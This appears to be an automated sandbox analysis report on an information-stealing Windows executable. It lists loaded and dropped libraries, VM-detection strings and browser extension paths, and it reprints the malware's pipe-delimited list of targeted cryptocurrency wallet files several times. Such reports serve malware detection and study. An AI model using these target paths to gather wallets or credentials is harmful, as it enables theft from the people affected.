Source: 9JtNIXVedn.exe, 00000000.00000003.1566125167.0000000021CD9000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000003.1575489765.0000000021CCD000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKEGCAKJKFIIEGI.0.dr, EGDBFIIECBGDGDGDHCAK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 9JtNIXVedn.exe String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: 9JtNIXVedn.exe String found in binary or memory: application/vnd.groove-help
Source: 9JtNIXVedn.exe String found in binary or memory: "application/x-install-instructions
Source: 9JtNIXVedn.exe String found in binary or memory: NATS-SEFI-ADD
Source: 9JtNIXVedn.exe String found in binary or memory: NATS-DANO-ADD
Source: 9JtNIXVedn.exe String found in binary or memory: JIS_C6229-1984-b-add
Source: 9JtNIXVedn.exe String found in binary or memory: jp-ocr-b-add
Source: 9JtNIXVedn.exe String found in binary or memory: JIS_C6229-1984-hand-add
Source: 9JtNIXVedn.exe String found in binary or memory: jp-ocr-hand-add
Source: 9JtNIXVedn.exe String found in binary or memory: ISO_6937-2-add
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: 9JtNIXVedn.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 9JtNIXVedn.exe Static file information: File size 10183264 > 1048576
Source: 9JtNIXVedn.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x577800
Source: 9JtNIXVedn.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x38a000
Source: 9JtNIXVedn.exe Static PE information: More than 200 imports for user32.dll
Source: 9JtNIXVedn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mozglue.pdbP source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: 9JtNIXVedn.exe Static PE information: section name: .didata
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDCEBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6CDCEBF0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: CBFBGCGI.0.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: CBFBGCGI.0.dr Binary or memory string: global block list test formVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: CBFBGCGI.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: CBFBGCGI.0.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: CBFBGCGI.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: CBFBGCGI.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: CBFBGCGI.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: CBFBGCGI.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: CBFBGCGI.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: CBFBGCGI.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: CBFBGCGI.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: CBFBGCGI.0.dr Binary or memory string: discord.comVMware20,11696497155f
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWI
Source: CBFBGCGI.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: CBFBGCGI.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: CBFBGCGI.0.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: CBFBGCGI.0.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: CBFBGCGI.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: CBFBGCGI.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: CBFBGCGI.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CE9AC62
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CEE4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6CEE4760
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6CDC1C30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE9AE71 cpuid 0_2_6CE9AE71
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CE9A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6CE9A8DC
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDE8390 NSS_GetVersion, 0_2_6CDE8390

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
